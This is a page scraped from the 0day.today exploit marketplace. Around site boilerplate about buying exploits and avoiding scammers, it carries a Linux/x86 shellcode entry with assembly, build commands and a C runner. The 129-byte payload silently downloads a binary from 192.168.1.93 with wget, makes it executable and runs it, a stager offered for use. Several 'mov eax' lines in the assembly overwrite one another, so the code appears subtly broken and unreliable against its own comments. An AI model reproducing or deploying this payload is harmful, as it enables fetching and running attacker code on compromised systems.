0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86 - Chmod + Execute (/usr/bin/wget 192.168.1.93//x) Hide Output Shellcode (129 bytes)
/** ; Shellcode 129 Bytes ; download (via wget) + chmod + execute shellcode + hide output ; Exec: /usr/bin/wget http://192.168.1.93//x > /dev/null 2>&1 ; global _start section .text _start: ;fork xor eax,eax mov al,0x2 int 0x80 xor ebx,ebx cmp eax,ebx jz download ; wait(NULL) xor eax,eax mov al,0x7 int 0x80 ; give execution permissions to the binary x xor ecx,ecx xor eax, eax push eax mov al, 0xf push 0x78 mov ebx, esp xor ecx, ecx mov cx, 0x1ff int 0x80 ; execution of binary x xor eax, eax push eax push 0x78 mov ebx, esp push eax mov edx, esp push ebx mov ecx, esp mov al, 11 int 0x80 download: push 0xb pop eax cdq push edx ; download uri mov eax, 0x31263e32 ; 1&>2 hide_output[4] mov eax, 0x6c6c756e ; llun/ hide_output[3] mov eax, 0x2f766564 ; ved hide_output[2] mov eax, 0x2f3e20 ; /> hide_output[1] mov eax, 0x782f2f ; x// path[1] mov eax, 0x33392e31 ;93.1 addr[3] mov eax, 0x2e383631 ;.861 addr[2] mov eax, 0x2e323931 ;.291 addr[1] push eax mov ecx,esp push edx ; download execution in /usr/bin/wget push 0x74 ;t push 0x6567772f ;egw/ push 0x6e69622f ;nib/ push 0x7273752f ;rsu/ mov ebx,esp push edx push ecx push ebx mov ecx,esp int 0x80 **/ // nasm -felf32 wget.nasm -o wget.o // ld -m elf_i386 wget.o -o wget #include <stdio.h> #include <string.h> // gcc -z execstack -fno-stack-protector shellcode.c -o shellcode // SHELLCODE 129 Bytes char buf[] = "\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8" "\x74\x2a\x31\xc0\xb0\x07\xcd\x80\x31\xc9" "\x31\xc0\x50\xb0\x0f\x6a\x78\x89\xe3\x31" "\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50" "\x6a\x78\x89\xe3\x50\x89\xe2\x53\x89\xe1" "\xb0\x0b\xcd\x80\x6a\x0b\x58\x99\x52\xb8" "\x32\x3e\x26\x31\xb8\x6e\x75\x6c\x6c\xb8" "\x64\x65\x76\x2f\xb8\x20\x3e\x2f\x00\xb8" "\x2f\x2f\x78\x00\xb8\x31\x2e\x39\x33\xb8" "\x31\x36\x38\x2e\xb8\x31\x39\x32\x2e\x50" "\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65" "\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72" "\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"; void main(int argc, char **argv) { int (*func)(); func = (int (*)()) buf; (int)(*func)(); } # 0day.today [2024-09-28] #